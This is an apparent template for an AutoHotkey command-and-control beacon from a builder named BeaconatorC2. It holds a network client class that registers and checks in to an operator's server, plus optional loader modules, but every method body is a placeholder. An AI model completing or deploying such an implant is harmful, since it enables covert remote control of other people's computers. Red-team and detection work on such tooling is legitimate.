; ============================================================================
; CUSTOM AHK BEACON - Generated by BeaconatorC2 Beacon Builder
; ============================================================================
; Generated: {{timestamp}}
; Modules: {{modules}}
; ============================================================================

#Requires AutoHotkey v2.0
#SingleInstance Force

; ============================================================================
; CONFIGURATION
; ============================================================================
global SERVER_IP := "{{server_ip}}"
global SERVER_PORT := {{server_port}}
global CHECK_IN_INTERVAL := {{checkin_interval}}

; ============================================================================
; LOGGING
; ============================================================================
{{logging_code}}

; ============================================================================
; HELPER FUNCTIONS
; ============================================================================
{{helpers_code}}

; ============================================================================
; BOF LOADER CLASSES (if BOF module selected)
; ============================================================================
{{bof_classes_code}}

; ============================================================================
; NETWORK CLIENT CLASS
; ============================================================================
class NetworkClient {
    ; Socket constants
    AF_INET := 2
    SOCK_STREAM := 1
    IPPROTO_TCP := 6
    SOCKET_ERROR := -1
    WSAEWOULDBLOCK := 10035
    WSAECONNREFUSED := 10061
    WSAETIMEDOUT := 10060

    ; Connection properties
    socket := 0
    wsaInitialized := false
    serverIP := "127.0.0.1"
    serverPort := 5074
    agentID := ""
    computerName := ""

    ; Check-in properties
    checkInInterval := 15000
    isRunning := false
    lastAction := ""
    isBusy := false

    __New(serverIP := "127.0.0.1", serverPort := 5074) {
        this.serverIP := serverIP
        this.serverPort := serverPort
        this.Initialize()
        this.computerName := A_ComputerName
        this.agentID := this.GenerateAgentID()
    }

    ; ========================================================================
    ; CORE METHODS
    ; ========================================================================
    {{core_methods}}

    ; ========================================================================
    ; REGISTRATION METHODS
    ; ========================================================================
    {{registration_methods}}

    ; ========================================================================
    ; CHECK-IN METHODS
    ; ========================================================================
    {{checkin_methods}}

    ; ========================================================================
    ; MODULE METHODS (based on selection)
    ; ========================================================================
    {{module_methods}}
}

; ============================================================================
; MAIN ENTRY POINT
; ============================================================================
{{main_code}}
